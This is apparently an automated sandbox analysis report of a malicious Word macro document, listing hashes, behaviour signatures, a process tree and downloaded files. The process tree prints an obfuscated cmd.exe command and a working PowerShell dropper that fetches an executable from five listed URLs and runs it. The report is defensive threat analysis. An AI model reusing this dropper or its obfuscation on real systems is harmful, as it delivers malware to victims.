Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-05-2024 18:19

General

  • Target

    5ac1e88265ded3e67477cce519906e50_JaffaCakes118.doc

  • Size

    126KB

  • MD5

    5ac1e88265ded3e67477cce519906e50

  • SHA1

    725f2a559f053ca645caa64f83e267f101474576

  • SHA256

    8e8423332fc3be61a54a2d4f2faaa5d0fac4de05af71a5fabbac0adac89d3456

  • SHA512

    72010c07a9ef5ea23e2d3e088c3c420c233ff5aa3d7c9b4bb6c7f453d8edda6c7a6787e461e57c441c2ad27170d12ca6343228d6c47597c24991bfbe56c6c99d

  • SSDEEP

    1536:8ptJlmrJpmxlRw99NBu+aFKUI4BxanVldfalV0UQwGZJCVwbGOrXWy:cte2dw99f1IkbLiNXy

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.knamanpower.com/U

exe.dropper

http://www.flanaganlaw.com/wkM

exe.dropper

http://lakecomoholidayapartments.com/uxbCg173

exe.dropper

http://farkop27.ru/uEEhY0

exe.dropper

http://juegosaleo.com/iu8xL5T1

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5ac1e88265ded3e67477cce519906e50_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2492
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /V/C"^s^e^t ^w^7=^8^7^_^ ^q*^j^ ^'4^7^ C^ ^z^ ^b^Z^S^ ^m^?^e^ n^{( Jv^|^ ^p^S^E^ ^<^+{^ (^'^W^ ^z^0^ ^ ^:^M^3^ ^J^L^U^ ^J^d^[^ ^T^.^Z^ ^,Z^m^ ^xN^\^}^{^o^6^}^Z^`V^{^t^1^u^h^A^8^7cP^;^9^t%R^F^aC^7^mcs^=^4^}/^d^*^;^.^wU^k^a^'^{^a^@'^`^eP^8^Kr^;X^D^b/^$^Z^;^i^kc^DC^B^]V^6^T^-z^8^j^h^$N^d)^ ^Y^:^Om^.^f^:^e^:^JC^t*^]^d^I^Q^d^p^-^x^B/^ep^&^F^k^*^8^\^o^:^w^Zv^mv^-n^s(^*^Imr^;^;1^T^')^mN^ ^D^L^MCV^`^]^#^z_^B^f^$]^x^z^ (^2^~^,^'^g^u^t^eC^:^Zz^AkN^T^k^W^$a^_^;(^$^p=^e^|/^&^l^|m^G^i^[^|^z^F^9^S^_^d^G^;^,^a^m^J^'^o^|e^5^l^]^5^_n^t^X^`^w^yR%^o^=^DR^D^;^D^j^.^E^h^9^I^]^<^'d^b^[^zw^W^i^~^$H^q^b^{^<^T^]^y^>^U^Er^:^q^e^tV)^s^{^E^|^i)^0^mA^z^k^;^&^zy^&^8^M^_^ER^$^Z^HR^ ^Z^dRn(w^I^i(^>^e^ ^;^1)^t^3^B^o^Z^bc(N^x^G^k^$^&^Q%(^M^b/^h/^;(c^x^[^1a^U^-[^e^7^a^Yr^B^uz^o^[^Y^9f^:^@^[^;^L^Z^|^'n^.^$^e^6;Kx^AR^u^e^t^A^G^.^-^@^1^'^5^Y^a^+c^m^[Z^Zr^Y^tV^#^:^b^m^2^w^$^7^I(^+C^W^;^'^f^ ^g^\^;^13^'(^H^h^+^\^:^Ac^@^{^o^iB^`5^l^fq^:^bV^0^T^uc^y^Up^H_^x^:^Z^p^$v^b^2^&n^p^I^?e^L^`^t^$^-^w^]^=^jD^Q^D^{^f^GV%^9^E^z^@^J)^$^AN^T^;%^x`^'/^&^~0^7n^?^1W^Q^]1^Y^g^G^'^t^=^J^ ^E^$^-^=^d^X^U^ ^U^<^m^Z^K^Gxt^Y^T^`b^y^L^_^$^3^O^G^;^y^IC)^p^6^F^'^,T^A^@x^EN^'^p^[^G(^xg^s^t^`^o^>^i^u(^M^lu^wy^p^o^G^;^S^;^sG^.^,5^E^'vu^l^1^-v^3^T^eC^+5^Q^yn^L^2^mAx^w^~^<^8^XN^}^u^[^<r^i^W^_v/^B^]^h^m^-(^'^o^Z^d%c^En^5^.^4CR^o^y^H^l^e^U^e^a^l^b~^x^a^>^a^Q^sv^P^<^o^JV^<^g^k^&^eer^8^k^u^W^g^h^j^bT^@/^<^{^:/^K^S(^:^.v^'^pN^F^p^tl^E^yt^ ^J^s^h^Ic^'^@^lI^-^0(^Q^3^Y@lm^h^$^4^L^E^9^p^7^Ey%^S^u^*Em/^y^T^i^u(^+/r^d^g^h^.^\^_^'^7^3^G^4^2^7^J^m^p^$^p^d^o^X^Y^z^k^M^.^lr^'^B^a^a^_R^X^f^?^|^m/)^D^;/^]^m^0^:^S^i^q^p^q)^0^t^0^u^|^t^O^4^H^h^.Br^@^2^u^F^3^6^9^=^7^{^ ^J^1^Z^:^I^g^|^@^IC^O^S^6^b^k^G-^x^l^W^u^u^W^1^ /^0^Q^9^m^G^#^J^o^i^&/c^H^*^f^.^d^}^Hs^>F^G^t^_^enn^X(^e^e^}^J^?^m(^O^u^t^A/nr^~h^j^a^w^,^*p{V^B^a^2^A^E^y^B^z^X^a^FC^4^d^>^K^=^iS^+^#^lcC^?^o%^l^G^h^:^Z%^o^p^`v^m^@^-^e^o^o^,acL^}^s^e^q0v^k^-^>^<^a^Q)^T^l)^:N/^3^a^O/V/g^:^g^i^\^p^U^I^O^t^\^:V^t^@z^'^h^Dn^7^@^H^Y(^M^y^I^Y^k^{v^U^w^p^b^i/^K^l^km^_s^L^o^U^d^@c^i^M^s.^-^K^J^w^o^F^W^a^W^:^8^l^g^O^0n^w^l^s^a^8^k^ ^g^ZC^u^a^}/^bnc^s^A^a(^W^A^l^J^g^z^f^&^>^;^.^~^,^G^w^h^8^L^w7^p^I^w^e^Y^b/,^Y^m/^y^Q^7^:)^&^>^p^U(^a^t^L^|^$^t^]^t^l^h^P^:^;^@^u^B^'^U^z^W^o/^2^L^w^m^,^q^\o^+P*c^&N^I^.^Y^#rr^0^|)^e^\^4^l^w$^~^e^or^_^|^p^d^,^ln=^E^Ka%E^Bm^z^q^*^a^<^;^>nJv^,^k^\R^d^.^a^d^q^w^Tc^W^w^=^a^?^w^`^0^./^|^t^j/^l^t^-^:^?~^W^p^8^\V^t^*^;{^tn^t^,^hrj^J^'^]^D^U^=^Q^8^.^z^:O^Q^z^s^B^S^M^ev`^$^hSC^;^65+^t^yn^dn^7T^6^e^si^G^i^U^Q)^l^T^,^7C^9^J^7^b^~N^t^eZ^\^}^WR^Dv.^0^G(^t^uv^8^e^`^D^&N^*^]6^ ^Hl^'^t^X^e^8c^iC^g^e^@^B^K^j^ ^}R^bc^-^d^o\^$^&^-^'^>^2^w^h^g^I^eV^-^tn^A^>^e^=r^H^U^I^sn^7^d^[^l^~w^A^MF^$^$8^: ^B^9^}^l^`^q^1^l^;^&)^e^4^}^E^h^,^*^ ^sN^sVr^Z^]^~^e^WT^k^w^6R^0^o^Z^Fz^p&&^f^or /^L %C ^in (^1^4^9^1^,^-^4^,^3)^d^o ^s^e^t ^D^b^4=!^D^b^4!!^w^7:~%C,1!&&^i^f %C ^l^e^q ^3 c^a^l^l %^D^b^4:^*^D^b^4^!^=%"##
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:528
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $wdI=new-object Net.WebClient;$Mzz='http://www.knamanpower.com/U@http://www.flanaganlaw.com/wkM@http://lakecomoholidayapartments.com/uxbCg173@http://farkop27.ru/uEEhY0@http://juegosaleo.com/iu8xL5T1'.Split('@');$btZ = '110';$zVD=$env:public+'\'+$btZ+'.exe';foreach($NZt in $Mzz){try{$wdI.DownloadFile($NZt, $zVD);Invoke-Item $zVD;break;}catch{}} ##
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2980

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCD9071.tmp\sist02.xsl

    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_igtgsnhr.5ag.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Public\110.exe

    Filesize

    36KB

    MD5

    41d9f8321bbd35aaf891f3b7bac060df

    SHA1

    58da7c06501159f4c7b909d59abc23152e8372ad

    SHA256

    29457444b7268825b17399a00ce19fcd9ecd6647b936f229c8ca2bb35ea4ca64

    SHA512

    5a23e2e3bd6713d0a66eb8ca74ac5ae878c549e20eb1d18423d7afa739d431685ebe0f66a8bf730c7b8188baaaedebe321294269de3e35e6b91bd07189803960

  • memory/2492-9-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-0-0x00007FF9D6B90000-0x00007FF9D6BA0000-memory.dmp

    Filesize

    64KB

  • memory/2492-30-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-6-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-8-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-1-0x00007FF9D6B90000-0x00007FF9D6BA0000-memory.dmp

    Filesize

    64KB

  • memory/2492-10-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-13-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-14-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-16-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-15-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-12-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-11-0x00007FF9D4390000-0x00007FF9D43A0000-memory.dmp

    Filesize

    64KB

  • memory/2492-7-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-569-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-4-0x00007FF9D6B90000-0x00007FF9D6BA0000-memory.dmp

    Filesize

    64KB

  • memory/2492-31-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-32-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-17-0x00007FF9D4390000-0x00007FF9D43A0000-memory.dmp

    Filesize

    64KB

  • memory/2492-5-0x00007FFA16BAD000-0x00007FFA16BAE000-memory.dmp

    Filesize

    4KB

  • memory/2492-3-0x00007FF9D6B90000-0x00007FF9D6BA0000-memory.dmp

    Filesize

    64KB

  • memory/2492-2-0x00007FF9D6B90000-0x00007FF9D6BA0000-memory.dmp

    Filesize

    64KB

  • memory/2492-543-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-544-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-545-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-566-0x00007FF9D6B90000-0x00007FF9D6BA0000-memory.dmp

    Filesize

    64KB

  • memory/2492-567-0x00007FF9D6B90000-0x00007FF9D6BA0000-memory.dmp

    Filesize

    64KB

  • memory/2492-565-0x00007FF9D6B90000-0x00007FF9D6BA0000-memory.dmp

    Filesize

    64KB

  • memory/2492-568-0x00007FF9D6B90000-0x00007FF9D6BA0000-memory.dmp

    Filesize

    64KB

  • memory/2980-38-0x000001F02A0A0000-0x000001F02A0C2000-memory.dmp

    Filesize

    136KB